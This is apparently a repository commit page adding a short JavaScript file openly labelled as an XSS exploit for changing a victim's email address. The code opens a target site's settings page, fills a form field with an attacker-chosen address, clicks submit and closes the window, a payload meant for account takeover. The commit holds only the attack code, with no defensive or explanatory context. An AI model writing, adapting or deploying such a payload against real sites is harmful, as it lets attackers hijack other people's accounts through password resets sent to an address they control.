Create email_change_exploit_xss.js

RepublicR0K · Oct 29, 2020 · d301938 · d301938
1 parent b90a7bf
commit d301938
Showing 1 changed file with 15 additions and 0 deletions.
diff --git a/email_change_exploit_xss.js b/email_change_exploit_xss.js
@@ -0,0 +1,15 @@
+// a Simple XSS exploit for email change 
+// R0K
+
+var dark_window = window.open('https://www.target.com/settings');
+dark_window.addEventListener('load', 
+
+	function exploit_run(){
+		dark_window.document.body.getElementsByTagName('form')[0][2].value='[email protected]' // changes email
+		dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
+
+		setTimeout(function() { // just for delay and closing
+			dark_window.close();
+		}, 10000);
+
+	}, true);